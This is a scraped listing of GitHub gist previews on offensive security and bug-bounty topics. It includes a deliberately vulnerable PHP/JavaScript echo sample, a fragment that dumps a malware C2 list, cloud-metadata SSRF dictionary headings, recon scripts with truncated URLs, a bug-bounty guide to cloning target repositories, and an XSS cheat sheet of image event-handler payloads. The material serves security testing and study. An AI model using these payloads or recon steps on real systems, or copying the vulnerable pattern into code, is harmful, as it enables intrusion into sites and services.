View HTMLEntitiesBypass.php
<!DOCTYPE html>
<!-- Vulnerable Code-->
document.write("<?php $xs=$_GET['payload']; echo htmlentities($xs);?>");
import socket
import struct
def dump_c2_list(c2_list):
    for i in range(0xFFFFFF):
        ip = Dword(c2_list + (i*8))
        if ip == 0:
jhaddix / cloud_metadata.txt
Last active Aug 14, 2022 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
EdOverflow /
Last active Aug 8, 2022
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. In this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python --org organization -o /tmp/output
jhaddix / all.txt
Last active Aug 13, 2022
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = '*.%s/*&output=json&fl=original&collapse=urlkey' % host
url = '*&output=json&fl=original&collapse=urlkey' % host
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
kurobeats / xss_vectors.txt
Last active Aug 11, 2022
XSS Vectors Cheat Sheet
View xss_vectors.txt
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
cure53 /
Last active Jan 16, 2022
WordPress Flash XSS in flashmediaelement.swf
BuffaloWill / cloud_metadata.txt
Last active Aug 4, 2022
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## IPv6 Tests
## AWS
# Amazon Web Services (No Header Required)
# from[ROLE NAME]